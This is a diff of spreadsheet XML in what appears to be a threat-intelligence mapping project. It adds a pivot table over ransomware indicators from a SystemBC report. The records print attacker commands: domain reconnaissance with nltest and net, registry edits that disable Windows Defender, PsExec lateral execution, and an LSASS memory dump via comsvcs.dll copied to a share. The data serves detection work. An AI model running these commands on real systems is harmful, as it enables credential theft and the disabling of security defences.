-        <v>9</v>
-      </c>
-    </row>
-    <row r="26" spans="1:7" ht="85" x14ac:dyDescent="0.2">
-      <c r="A26" s="1" t="s">
+      <c r="E26" s="1"/>
+      <c r="F26" s="1" t="s">
+        <v>8</v>
+      </c>
+    </row>
+    <row r="27" spans="1:6" ht="68" x14ac:dyDescent="0.2">
+      <c r="A27" s="1" t="s">
         <v>59</v>
       </c>
-      <c r="B26" s="1"/>
-      <c r="C26" s="1"/>
-      <c r="D26" s="1" t="s">
-        <v>62</v>
-      </c>
-      <c r="E26" s="1" t="s">
+      <c r="B27" s="1"/>
+      <c r="C27" s="1" t="s">
+        <v>61</v>
+      </c>
+      <c r="D27" s="1" t="s">
         <v>32</v>
       </c>
-      <c r="F26" s="1"/>
-      <c r="G26" s="1" t="s">
-        <v>9</v>
-      </c>
-    </row>
-    <row r="27" spans="1:7" ht="68" x14ac:dyDescent="0.2">
-      <c r="A27" s="1" t="s">
+      <c r="E27" s="1"/>
+      <c r="F27" s="1" t="s">
+        <v>8</v>
+      </c>
+    </row>
+    <row r="28" spans="1:6" ht="102" x14ac:dyDescent="0.2">
+      <c r="A28" s="1" t="s">
         <v>60</v>
       </c>
-      <c r="B27" s="1"/>
-      <c r="C27" s="1"/>
-      <c r="D27" s="1" t="s">
-        <v>62</v>
-      </c>
-      <c r="E27" s="1" t="s">
+      <c r="B28" s="1"/>
+      <c r="C28" s="1" t="s">
+        <v>6</v>
+      </c>
+      <c r="D28" s="1" t="s">
         <v>33</v>
       </c>
-      <c r="F27" s="1"/>
-      <c r="G27" s="1" t="s">
-        <v>9</v>
-      </c>
-    </row>
-    <row r="28" spans="1:7" ht="102" x14ac:dyDescent="0.2">
-      <c r="A28" s="1" t="s">
-        <v>61</v>
-      </c>
-      <c r="B28" s="1"/>
-      <c r="C28" s="1"/>
-      <c r="D28" s="1" t="s">
-        <v>7</v>
-      </c>
-      <c r="E28" s="1" t="s">
-        <v>34</v>
-      </c>
-      <c r="F28" s="1"/>
-      <c r="G28" s="1" t="s">
-        <v>9</v>
+      <c r="E28" s="1"/>
+      <c r="F28" s="1" t="s">
+        <v>8</v>
       </c>
     </row>
   </sheetData>

--- a/delta2/lib_e/osi_ransom/tag_none.xlsx
+++ b/delta2/lib_e/osi_ransom/tag_none.xlsx
@@ -8,14 +8,18 @@
       <x15ac:absPath xmlns:x15ac="http://schemas.microsoft.com/office/spreadsheetml/2010/11/ac" url="/Users/harveywargo/Desktop/GithubProjects/h2w-delta/delta2/lib_e/osi_ransom/"/>
     </mc:Choice>
   </mc:AlternateContent>
-  <xr:revisionPtr revIDLastSave="0" documentId="13_ncr:1_{44D38BA2-6089-AA42-BD5C-A27467DEC2F8}" xr6:coauthVersionLast="47" xr6:coauthVersionMax="47" xr10:uidLastSave="{00000000-0000-0000-0000-000000000000}"/>
+  <xr:revisionPtr revIDLastSave="0" documentId="13_ncr:1_{B9C48ADE-8362-5F48-8159-77101849593E}" xr6:coauthVersionLast="47" xr6:coauthVersionMax="47" xr10:uidLastSave="{00000000-0000-0000-0000-000000000000}"/>
   <bookViews>
-    <workbookView xWindow="38400" yWindow="-21100" windowWidth="38400" windowHeight="21100" xr2:uid="{2B361B8B-B20C-1B4A-9CA2-9DEA1E5C6017}"/>
+    <workbookView xWindow="0" yWindow="-21100" windowWidth="38400" windowHeight="21100" activeTab="1" xr2:uid="{2B361B8B-B20C-1B4A-9CA2-9DEA1E5C6017}"/>
   </bookViews>
   <sheets>
     <sheet name="sheet1" sheetId="1" r:id="rId1"/>
+    <sheet name="Sheet2" sheetId="2" r:id="rId2"/>
   </sheets>
   <calcPr calcId="191029"/>
+  <pivotCaches>
+    <pivotCache cacheId="17" r:id="rId3"/>
+  </pivotCaches>
   <extLst>
     <ext xmlns:x15="http://schemas.microsoft.com/office/spreadsheetml/2010/11/main" uri="{140A7094-0E35-4892-8432-C4D2E57EDEB5}">
       <x15:workbookPr chartTrackingRefBase="1"/>
@@ -36,7 +40,7 @@
 </file>
 
 <file path=xl/sharedStrings.xml><?xml version="1.0" encoding="utf-8"?>
-<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="115" uniqueCount="63">
+<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="143" uniqueCount="72">
   <si>
     <t>eid</t>
   </si>
@@ -240,6 +244,33 @@
   </si>
   <si>
     <t>file_path</t>
+  </si>
+  <si>
+    <t>nltest-pid</t>
+  </si>
+  <si>
+    <t>netclt-pid</t>
+  </si>
+  <si>
+    <t>registry-pid</t>
+  </si>
+  <si>
+    <t>psexec-pid</t>
+  </si>
+  <si>
+    <t>comsvcs-pid, rundll-pid</t>
+  </si>
+  <si>
+    <t>Row Labels</t>
+  </si>
+  <si>
+    <t>Grand Total</t>
+  </si>
+  <si>
+    <t>Count of map_pid</t>
+  </si>
+  <si>
+    <t>Count of eid</t>
   </si>
 </sst>
 </file>
@@ -281,11 +312,16 @@
   <cellStyleXfs count="1">
     <xf numFmtId="0" fontId="0" fillId="0" borderId="0"/>
   </cellStyleXfs>
-  <cellXfs count="2">
+  <cellXfs count="5">
     <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0"/>
     <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0" applyAlignment="1">
       <alignment wrapText="1"/>
     </xf>
+    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0" pivotButton="1"/>
+    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0" applyAlignment="1">
+      <alignment horizontal="left"/>
+    </xf>
+    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0" applyNumberFormat="1"/>
   </cellXfs>
   <cellStyles count="1">
     <cellStyle name="Normal" xfId="0" builtinId="0"/>
@@ -341,6 +377,392 @@
     </ext>
   </extLst>
 </styleSheet>
+</file>
+
+<file path=xl/pivotCache/pivotCacheDefinition1.xml><?xml version="1.0" encoding="utf-8"?>
+<pivotCacheDefinition xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:xr="http://schemas.microsoft.com/office/spreadsheetml/2014/revision" mc:Ignorable="xr" r:id="rId1" refreshedBy="Harvey Wargo" refreshedDate="45765.529791550929" createdVersion="8" refreshedVersion="8" minRefreshableVersion="3" recordCount="27" xr:uid="{73D7FD50-9762-EF48-A89B-C16461A73386}">
+  <cacheSource type="worksheet">
+    <worksheetSource name="Table1"/>
+  </cacheSource>
+  <cacheFields count="6">
+    <cacheField name="eid" numFmtId="0">
+      <sharedItems count="27">
+        <s v="ransom_gen-eid0001"/>
+        <s v="ransom_gen-eid0002"/>
+        <s v="ransom_gen-eid0003"/>
+        <s v="ransom_gen-eid0004"/>
+        <s v="ransom_gen-eid0005"/>
+        <s v="ransom_gen-eid0006"/>
+        <s v="ransom_gen-eid0007"/>
+        <s v="ransom_gen-eid0008"/>
+        <s v="ransom_gen-eid0009"/>
+        <s v="ransom_gen-eid0010"/>
+        <s v="ransom_gen-eid0011"/>
+        <s v="ransom_gen-eid0012"/>
+        <s v="ransom_gen-eid0013"/>
+        <s v="ransom_gen-eid0014"/>
+        <s v="ransom_gen-eid0015"/>
+        <s v="ransom_gen-eid0016"/>
+        <s v="ransom_gen-eid0017"/>
+        <s v="ransom_gen-eid0018"/>
+        <s v="ransom_gen-eid0019"/>
+        <s v="ransom_gen-eid0020"/>
+        <s v="ransom_gen-eid0021"/>
+        <s v="ransom_gen-eid0022"/>
+        <s v="ransom_gen-eid0023"/>
+        <s v="ransom_gen-eid0024"/>
+        <s v="ransom_gen-eid0025"/>
+        <s v="ransom_gen-eid0026"/>
+        <s v="ransom_gen-eid0027"/>
+      </sharedItems>
+    </cacheField>
+    <cacheField name="map_pid" numFmtId="0">
+      <sharedItems containsBlank="1" count="6">
+        <s v="nltest-pid"/>
+        <s v="netclt-pid"/>
+        <m/>
+        <s v="registry-pid"/>
+        <s v="psexec-pid"/>
+        <s v="comsvcs-pid, rundll-pid"/>
+      </sharedItems>
+    </cacheField>
+    <cacheField name="eid_type" numFmtId="0">
+      <sharedItems/>
+    </cacheField>
+    <cacheField name="evidence" numFmtId="0">
+      <sharedItems longText="1"/>
+    </cacheField>
+    <cacheField name="description" numFmtId="0">
+      <sharedItems containsBlank="1"/>
+    </cacheField>
+    <cacheField name="ns_meta" numFmtId="0">
+      <sharedItems count="1">
+        <s v="{ &quot;date&quot;: &quot;2021-05-10&quot;, &quot;url&quot;: &quot;https://labs.withsecure.com/publications/prelude-to-ransomware-systembc&quot;, &quot;malware&quot;: &quot;systembc&quot;}"/>
+      </sharedItems>
+    </cacheField>
+  </cacheFields>
+  <extLst>
+    <ext xmlns:x14="http://schemas.microsoft.com/office/spreadsheetml/2009/9/main" uri="{725AE2AE-9491-48be-B2B4-4EB974FC3084}">
+      <x14:pivotCacheDefinition/>
+    </ext>
+  </extLst>
+</pivotCacheDefinition>
+</file>
+
+<file path=xl/pivotCache/pivotCacheRecords1.xml><?xml version="1.0" encoding="utf-8"?>
+<pivotCacheRecords xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:xr="http://schemas.microsoft.com/office/spreadsheetml/2014/revision" mc:Ignorable="xr" count="27">
+  <r>
+    <x v="0"/>
+    <x v="0"/>
+    <s v="cmdline"/>
+    <s v="C:\Windows\System32\nltest.exe /dclist: &lt;DOMAIN&gt;"/>
+    <m/>
+    <x v="0"/>
+  </r>
+  <r>
+    <x v="1"/>
+    <x v="1"/>
+    <s v="cmdline"/>
+    <s v="C:\Windows\System32\net.exe group &quot;domain computers&quot; /domain"/>
+    <m/>
+    <x v="0"/>
+  </r>
+  <r>
+    <x v="2"/>
+    <x v="1"/>
+    <s v="cmdline"/>
+    <s v="C:\Windows\System32\net.exe group &quot;domain admins&quot; /domain"/>
+    <m/>
+    <x v="0"/>
+  </r>
+  <r>
+    <x v="3"/>
+    <x v="1"/>
+    <s v="cmdline"/>
+    <s v="C:\Windows\System32\net.exe user &lt;USER&gt; /domain"/>
+    <m/>
+    <x v="0"/>
+  </r>
+  <r>
+    <x v="4"/>
+    <x v="1"/>
+    <s v="cmdline"/>
+    <s v="C:\Windows\System32\net.exe group &quot;enterprise admins&quot; /domain"/>
+    <m/>
+    <x v="0"/>
+  </r>
+  <r>
+    <x v="5"/>
+    <x v="2"/>
+    <s v="file_path"/>
+    <s v="%USERPROFILE%\Downloads\Advanced_IP_Scanner_2.5.3850.exe"/>
+    <m/>
+    <x v="0"/>
+  </r>
+  <r>
+    <x v="6"/>
+    <x v="3"/>
+    <s v="cmdline"/>
+    <s v="reg.exe add &quot;HKLM\Software\Policies\Microsoft\Windows Defender&quot; /v DisableAntiSpyware /t REG_DWORD /d 1 /f"/>
+    <m/>
+    <x v="0"/>
+  </r>
+  <r>
+    <x v="7"/>
+    <x v="3"/>
+    <s v="cmdline"/>
+    <s v="reg.exe add &quot;HKLM\Software\Policies\Microsoft\Windows Defender&quot; /v DisableAntiVirus /t REG_DWORD /d 1 /f"/>
+    <m/>
+    <x v="0"/>
+  </r>
+  <r>
+    <x v="8"/>
+    <x v="3"/>
+    <s v="cmdline"/>
+    <s v="reg.exe add &quot;HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine&quot; /v MpEnablePus /t REG_DWORD /d 0 /f"/>
+    <m/>
+    <x v="0"/>
+  </r>
+  <r>
+    <x v="9"/>
+    <x v="3"/>
+    <s v="cmdline"/>
+    <s v="reg.exe add &quot;HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection&quot; /v DisableBehaviorMonitoring /t REG_DWORD /d 1 /f"/>
+    <m/>
+    <x v="0"/>
+  </r>
+  <r>
+    <x v="10"/>
+    <x v="3"/>
+    <s v="cmdline"/>
+    <s v="reg.exe add &quot;HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection&quot; /v DisableIOAVProtection /t REG_DWORD /d 1 /f"/>
+    <m/>
+    <x v="0"/>
+  </r>
+  <r>
+    <x v="11"/>
+    <x v="3"/>
+    <s v="cmdline"/>
+    <s v="reg.exe add &quot;HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection&quot; /v DisableOnAccessProtection /t REG_DWORD /d 1 /f"/>
+    <m/>
+    <x v="0"/>
+  </r>
+  <r>
+    <x v="12"/>
+    <x v="3"/>
+    <s v="cmdline"/>
+    <s v="reg.exe add &quot;HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection&quot; /v DisableRealtimeMonitoring /t REG_DWORD /d 1 /f"/>
+    <m/>
+    <x v="0"/>
+  </r>
+  <r>
+    <x v="13"/>
+    <x v="3"/>
+    <s v="cmdline"/>
+    <s v="reg.exe add &quot;HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection&quot; /v DisableRoutinelyTakingAction /t REG_DWORD /d 1 /f"/>
+    <m/>
+    <x v="0"/>
+  </r>
+  <r>
+    <x v="14"/>
+    <x v="3"/>
+    <s v="cmdline"/>
+    <s v="reg.exe add &quot;HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection&quot; /v DisableScanOnRealtimeEnable /t REG_DWORD /d 1 /f"/>
+    <m/>
+    <x v="0"/>
+  </r>
+  <r>
+    <x v="15"/>
+    <x v="3"/>
+    <s v="cmdline"/>
+    <s v="reg.exe add &quot;HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet&quot; /v DisableBlockAtFirstSeen /t REG_DWORD /d 1 /f"/>
+    <m/>
+    <x v="0"/>
+  </r>
+  <r>
+    <x v="16"/>
+    <x v="3"/>
+    <s v="cmdline"/>
+    <s v="reg.exe add &quot;HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet&quot; /v SpynetReporting /t REG_DWORD /d 0 /f"/>
+    <m/>
+    <x v="0"/>
+  </r>
+  <r>
+    <x v="17"/>
+    <x v="3"/>
+    <s v="cmdline"/>
+    <s v="reg.exe add &quot;HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet&quot; /v SubmitSamplesConsent /t REG_DWORD /d 2 /f"/>
+    <m/>
+    <x v="0"/>
+  </r>
+  <r>
+    <x v="18"/>
+    <x v="3"/>
+    <s v="cmdline"/>
+    <s v="reg.exe delete &quot;HKLM\Software\Policies\Microsoft\Windows Defender&quot; /f"/>
+    <m/>
+    <x v="0"/>
+  </r>
+  <r>
+    <x v="19"/>
+    <x v="2"/>
+    <s v="generic"/>
+    <s v="servers0.bat_x000a_1.ps1_x000a_a.ps1_x000a_PsExec.exe"/>
+    <s v="files "/>
+    <x v="0"/>
+  </r>
+  <r>
+    <x v="20"/>
+    <x v="4"/>
+    <s v="cmdline"/>
+    <s v="start PsExec.exe -d \\&lt;hostname&gt; -u &quot;&lt;username&gt;&quot; -p &quot;&lt;pass&gt;&quot; -accepteula -s cmd /c &quot;powershell.exe -ExecutionPolicy Bypass -file \\&lt;share&gt;\l.ps1&quot;"/>
+    <m/>
+    <x v="0"/>
+  </r>
+  <r>
+    <x v="21"/>
+    <x v="4"/>
+    <s v="cmdline"/>
+    <s v="start PsExec.exe -d \\&lt;hostname&gt; -u &quot;&lt;username&gt;&quot; -p &quot;&lt;pass&gt;$&quot; -accepteula -s cmd /c &quot;powershell.exe -ExecutionPolicy Bypass -file \\&lt;share&gt;\l.ps1&quot;"/>
+    <m/>
+    <x v="0"/>
+  </r>
+  <r>
+    <x v="22"/>
+    <x v="4"/>
+    <s v="cmdline"/>
+    <s v="start PsExec.exe -d \\&lt;hostname&gt; -u &quot;&lt;username&gt;&quot; -p &quot;&lt;pass&gt;$&quot; -accepteula -s cmd /c &quot;powershell.exe -ExecutionPolicy Bypass -file \\&lt;share&gt;\l.ps1&quot;"/>
+    <m/>
+    <x v="0"/>
+  </r>
+  <r>
+    <x v="23"/>
+    <x v="4"/>
+    <s v="cmdline"/>
+    <s v="start PsExec.exe -d \\&lt;hostname&gt; -u &quot;&lt;username&gt;&quot; -p &quot;&lt;pass&gt;$&quot; -accepteula -s cmd /c &quot;powershell.exe -ExecutionPolicy Bypass -file \\&lt;share&gt;\l.ps1&quot;"/>
+    <m/>
+    <x v="0"/>
+  </r>
+  <r>
+    <x v="24"/>
+    <x v="5"/>
+    <s v="cmdline"/>
+    <s v="$computerName = $env:computername;_x000a_$procid = Get-Process | Where-Object {$_.ProcessName -eq 'lsass'} | Select-Object Id_x000a_Powershell -c rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump $procid.Id $Env:TEMP$computerName full_x000a_Start-Sleep -s 59_x000a_Copy-Item -Path $Env:TEMP$computerName -Destination &quot;\\&lt;hostname&gt;\&lt;share&gt;\$($computerName)&quot;"/>
+    <m/>
+    <x v="0"/>
+  </r>
+  <r>
+    <x v="25"/>
+    <x v="2"/>
+    <s v="cmdline"/>
+    <s v="$path = &quot;\\&lt;hostname&gt;.&lt;domain&gt;\s$\&quot; + $env:computername;_x000a_$OutputVariable = (cmd.exe /c tasklist /v) | Out-File -FilePath &quot;$($path)_task.txt&quot; -Append;_x000a_$OutputVariable = (cmd.exe /c arp -a) | Out-File -FilePath &quot;$($path)_arp.txt&quot; -Append;_x000a_$OutputVariable = (cmd.exe /c dir C:\users) | Out-File -FilePath &quot;$($path)_users.txt&quot; -Append;"/>
+    <m/>
+    <x v="0"/>
+  </r>
+  <r>
+    <x v="26"/>
+    <x v="2"/>
+    <s v="generic"/>
+    <s v="File Name: svchost.exe_x000a_SHA1: f8af1b293aecdb3d1fe038b4b638f283ee852287_x000a_MD5: fa93cfe0898c704551cefdfa193d406f_x000a_SHA256: 2dc93817039e6fa4fae014e1386cffa7ac35b89feac59d8abe7f51be1c089580_x000a_Path: C:\Users\Public\svchost.exe_x000a_Execution Command Line: C:\Users\Public\svchost.exe start"/>
+    <m/>
+    <x v="0"/>
+  </r>
+</pivotCacheRecords>
+</file>
+
+<file path=xl/pivotTables/pivotTable1.xml><?xml version="1.0" encoding="utf-8"?>
+<pivotTableDefinition xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:xr="http://schemas.microsoft.com/office/spreadsheetml/2014/revision" mc:Ignorable="xr" xr:uid="{2D16E6DC-E7FF-C649-A21C-E2C4A7F4CB78}" name="PivotTable2" cacheId="17" applyNumberFormats="0" applyBorderFormats="0" applyFontFormats="0" applyPatternFormats="0" applyAlignmentFormats="0" applyWidthHeightFormats="1" dataCaption="Values" updatedVersion="8" minRefreshableVersion="3" useAutoFormatting="1" itemPrintTitles="1" createdVersion="8" indent="0" outline="1" outlineData="1" multipleFieldFilters="0">
+  <location ref="A3:C5" firstHeaderRow="0" firstDataRow="1" firstDataCol="1"/>
+  <pivotFields count="6">
+    <pivotField dataField="1" showAll="0">
+      <items count="28">
+        <item x="0"/>
+        <item x="1"/>
+        <item x="2"/>
+        <item x="3"/>
+        <item x="4"/>
+        <item x="5"/>
+        <item x="6"/>
+        <item x="7"/>
+        <item x="8"/>
+        <item x="9"/>
+        <item x="10"/>
+        <item x="11"/>
+        <item x="12"/>
+        <item x="13"/>
+        <item x="14"/>
+        <item x="15"/>
+        <item x="16"/>
+        <item x="17"/>
+        <item x="18"/>
+        <item x="19"/>
+        <item x="20"/>
+        <item x="21"/>
+        <item x="22"/>
+        <item x="23"/>
+        <item x="24"/>
+        <item x="25"/>
+        <item x="26"/>
+        <item t="default"/>
+      </items>
+    </pivotField>
+    <pivotField dataField="1" showAll="0">
+      <items count="7">
+        <item x="5"/>
+        <item x="1"/>
+        <item x="0"/>
+        <item x="4"/>
+        <item x="3"/>
+        <item x="2"/>
+        <item t="default"/>
+      </items>
+    </pivotField>
+    <pivotField showAll="0"/>
+    <pivotField showAll="0"/>
+    <pivotField showAll="0"/>
+    <pivotField axis="axisRow" showAll="0">
+      <items count="2">
+        <item x="0"/>
+        <item t="default"/>
+      </items>
+    </pivotField>
+  </pivotFields>
+  <rowFields count="1">
+    <field x="5"/>
+  </rowFields>
+  <rowItems count="2">
+    <i>
+      <x/>
+    </i>
+    <i t="grand">
+      <x/>
+    </i>
+  </rowItems>
+  <colFields count="1">
+    <field x="-2"/>
+  </colFields>
+  <colItems count="2">
+    <i>
+      <x/>
+    </i>
+    <i i="1">
+      <x v="1"/>
+    </i>
+  </colItems>
+  <dataFields count="2">
+    <dataField name="Count of map_pid" fld="1" subtotal="count" baseField="0" baseItem="0"/>
+    <dataField name="Count of eid" fld="0" subtotal="count" baseField="0" baseItem="0"/>
+  </dataFields>
+  <pivotTableStyleInfo name="PivotStyleLight16" showRowHeaders="1" showColHeaders="1" showRowStripes="0" showColStripes="0" showLastColumn="1"/>
+  <extLst>
+    <ext xmlns:x14="http://schemas.microsoft.com/office/spreadsheetml/2009/9/main" uri="{962EF5D1-5CA2-4c93-8EF4-DBF5C05439D2}">
+      <x14:pivotTableDefinition xmlns:xm="http://schemas.microsoft.com/office/excel/2006/main" hideValuesRow="1"/>
+    </ext>
+    <ext xmlns:xpdl="http://schemas.microsoft.com/office/spreadsheetml/2016/pivotdefaultlayout" uri="{747A6164-185A-40DC-8AA5-F01512510D54}">
+      <xpdl:pivotTableDefinition16/>
+    </ext>
+  </extLst>
+</pivotTableDefinition>
 </file>
 
 <file path=xl/tables/table1.xml><?xml version="1.0" encoding="utf-8"?>
@@ -680,9 +1102,9 @@
 <worksheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:x14ac="http://schemas.microsoft.com/office/spreadsheetml/2009/9/ac" xmlns:xr="http://schemas.microsoft.com/office/spreadsheetml/2014/revision" xmlns:xr2="http://schemas.microsoft.com/office/spreadsheetml/2015/revision2" xmlns:xr3="http://schemas.microsoft.com/office/spreadsheetml/2016/revision3" mc:Ignorable="x14ac xr xr2 xr3" xr:uid="{CADA5849-2682-F643-8842-EFF560F6FB5C}">
   <dimension ref="A1:F28"/>
   <sheetViews>
-    <sheetView tabSelected="1" workbookViewId="0">
+    <sheetView topLeftCell="D1" workbookViewId="0">
       <pane ySplit="1" topLeftCell="A2" activePane="bottomLeft" state="frozen"/>
-      <selection pane="bottomLeft" activeCell="C1" sqref="C1:C1048576"/>
+      <selection pane="bottomLeft" activeCell="F19" sqref="F19"/>
     </sheetView>
   </sheetViews>
   <sheetFormatPr baseColWidth="10" defaultRowHeight="16" x14ac:dyDescent="0.2"/>
@@ -719,7 +1141,9 @@
       <c r="A2" s="1" t="s">
         <v>34</v>
       </c>
-      <c r="B2" s="1"/>
+      <c r="B2" s="1" t="s">
+        <v>63</v>
+      </c>
       <c r="C2" s="1" t="s">
         <v>61</v>
       </c>
@@ -735,7 +1159,9 @@
       <c r="A3" s="1" t="s">
         <v>35</v>
       </c>
-      <c r="B3" s="1"/>
+      <c r="B3" s="1" t="s">
+        <v>64</v>
+      </c>
       <c r="C3" s="1" t="s">
         <v>61</v>
       </c>
@@ -751,7 +1177,9 @@
       <c r="A4" s="1" t="s">
         <v>36</v>
       </c>
-      <c r="B4" s="1"/>
+      <c r="B4" s="1" t="s">
+        <v>64</v>
+      </c>
       <c r="C4" s="1" t="s">
         <v>61</v>
       </c>
@@ -767,7 +1195,9 @@
       <c r="A5" s="1" t="s">
         <v>37</v>
       </c>
-      <c r="B5" s="1"/>
+      <c r="B5" s="1" t="s">
+        <v>64</v>
+      </c>
       <c r="C5" s="1" t="s">
         <v>61</v>
       </c>
@@ -783,7 +1213,9 @@
       <c r="A6" s="1" t="s">
         <v>38</v>
       </c>
-      <c r="B6" s="1"/>
+      <c r="B6" s="1" t="s">
+        <v>64</v>
+      </c>
       <c r="C6" s="1" t="s">
         <v>61</v>
       </c>
@@ -815,7 +1247,9 @@
       <c r="A8" s="1" t="s">
         <v>40</v>
       </c>
-      <c r="B8" s="1"/>
+      <c r="B8" s="1" t="s">
+        <v>65</v>
+      </c>
       <c r="C8" s="1" t="s">
         <v>61</v>
       </c>
@@ -831,7 +1265,9 @@
       <c r="A9" s="1" t="s">
         <v>41</v>
       </c>
-      <c r="B9" s="1"/>
+      <c r="B9" s="1" t="s">
+        <v>65</v>
+      </c>
       <c r="C9" s="1" t="s">
         <v>61</v>
       </c>
@@ -847,7 +1283,9 @@
       <c r="A10" s="1" t="s">
         <v>42</v>
       </c>
-      <c r="B10" s="1"/>
+      <c r="B10" s="1" t="s">
+        <v>65</v>
+      </c>
       <c r="C10" s="1" t="s">
         <v>61</v>
       </c>
@@ -863,7 +1301,9 @@
       <c r="A11" s="1" t="s">
         <v>43</v>
       </c>
-      <c r="B11" s="1"/>
+      <c r="B11" s="1" t="s">
+        <v>65</v>
+      </c>
       <c r="C11" s="1" t="s">
         <v>61</v>
       </c>
@@ -879,7 +1319,9 @@
       <c r="A12" s="1" t="s">
         <v>44</v>
       </c>
-      <c r="B12" s="1"/>
+      <c r="B12" s="1" t="s">
+        <v>65</v>
+      </c>
       <c r="C12" s="1" t="s">
         <v>61</v>
       </c>
@@ -895,7 +1337,9 @@
       <c r="A13" s="1" t="s">
         <v>45</v>
       </c>
-      <c r="B13" s="1"/>
+      <c r="B13" s="1" t="s">
+        <v>65</v>
+      </c>
       <c r="C13" s="1" t="s">
         <v>61</v>
       </c>
@@ -911,7 +1355,9 @@
       <c r="A14" s="1" t="s">
         <v>46</v>
       </c>
-      <c r="B14" s="1"/>
+      <c r="B14" s="1" t="s">
+        <v>65</v>
+      </c>
       <c r="C14" s="1" t="s">
         <v>61</v>
       </c>
@@ -927,7 +1373,9 @@
       <c r="A15" s="1" t="s">
         <v>47</v>
       </c>
-      <c r="B15" s="1"/>
+      <c r="B15" s="1" t="s">
+        <v>65</v>
+      </c>
       <c r="C15" s="1" t="s">
         <v>61</v>
       </c>
@@ -943,7 +1391,9 @@
       <c r="A16" s="1" t="s">
         <v>48</v>
       </c>
-      <c r="B16" s="1"/>
+      <c r="B16" s="1" t="s">
+        <v>65</v>
+      </c>
       <c r="C16" s="1" t="s">
         <v>61</v>
       </c>
@@ -959,7 +1409,9 @@
       <c r="A17" s="1" t="s">
         <v>49</v>
       </c>
-      <c r="B17" s="1"/>
+      <c r="B17" s="1" t="s">
+        <v>65</v>
+      </c>
       <c r="C17" s="1" t="s">
         <v>61</v>
       </c>
@@ -975,7 +1427,9 @@
       <c r="A18" s="1" t="s">
         <v>50</v>
       </c>
-      <c r="B18" s="1"/>
+      <c r="B18" s="1" t="s">
+        <v>65</v>
+      </c>
       <c r="C18" s="1" t="s">
         <v>61</v>
       </c>
@@ -991,7 +1445,9 @@
       <c r="A19" s="1" t="s">
         <v>51</v>
       </c>
-      <c r="B19" s="1"/>
+      <c r="B19" s="1" t="s">
+        <v>65</v>
+      </c>
       <c r="C19" s="1" t="s">
         <v>61</v>
       </c>
@@ -1007,7 +1463,9 @@
       <c r="A20" s="1" t="s">
         <v>52</v>
       </c>
-      <c r="B20" s="1"/>
+      <c r="B20" s="1" t="s">
+        <v>65</v>
+      </c>
       <c r="C20" s="1" t="s">
         <v>61</v>
       </c>
@@ -1041,7 +1499,9 @@
       <c r="A22" s="1" t="s">
         <v>54</v>
       </c>
-      <c r="B22" s="1"/>
+      <c r="B22" s="1" t="s">
+        <v>66</v>
+      </c>
       <c r="C22" s="1" t="s">
         <v>61</v>
       </c>
@@ -1057,7 +1517,9 @@
       <c r="A23" s="1" t="s">
         <v>55</v>
       </c>
-      <c r="B23" s="1"/>
+      <c r="B23" s="1" t="s">
+        <v>66</v>
+      </c>
       <c r="C23" s="1" t="s">
         <v>61</v>
       </c>
@@ -1073,7 +1535,9 @@
       <c r="A24" s="1" t="s">
         <v>56</v>
       </c>
-      <c r="B24" s="1"/>
+      <c r="B24" s="1" t="s">
+        <v>66</v>
+      </c>
       <c r="C24" s="1" t="s">
         <v>61</v>
       </c>
@@ -1089,7 +1553,9 @@
       <c r="A25" s="1" t="s">
         <v>57</v>
       </c>
-      <c r="B25" s="1"/>
+      <c r="B25" s="1" t="s">
+        <v>66</v>
+      </c>
       <c r="C25" s="1" t="s">
         <v>61</v>
       </c>
@@ -1105,7 +1571,9 @@
       <c r="A26" s="1" t="s">
         <v>58</v>
       </c>
-      <c r="B26" s="1"/>
+      <c r="B26" s="1" t="s">
+        <v>67</v>
+      </c>
       <c r="C26" s="1" t="s">
         <v>61</v>
       </c>
@@ -1156,4 +1624,57 @@
     <tablePart r:id="rId1"/>
   </tableParts>
 </worksheet>
+</file>
+
+<file path=xl/worksheets/sheet2.xml><?xml version="1.0" encoding="utf-8"?>
+<worksheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:x14ac="http://schemas.microsoft.com/office/spreadsheetml/2009/9/ac" xmlns:xr="http://schemas.microsoft.com/office/spreadsheetml/2014/revision" xmlns:xr2="http://schemas.microsoft.com/office/spreadsheetml/2015/revision2" xmlns:xr3="http://schemas.microsoft.com/office/spreadsheetml/2016/revision3" mc:Ignorable="x14ac xr xr2 xr3" xr:uid="{5CAF8F04-BD36-C041-9B46-C40463306E4A}">
+  <dimension ref="A3:C5"/>
+  <sheetViews>
+    <sheetView tabSelected="1" workbookViewId="0">
+      <selection activeCell="A3" sqref="A3"/>
+    </sheetView>
+  </sheetViews>
+  <sheetFormatPr baseColWidth="10" defaultRowHeight="16" x14ac:dyDescent="0.2"/>
+  <cols>
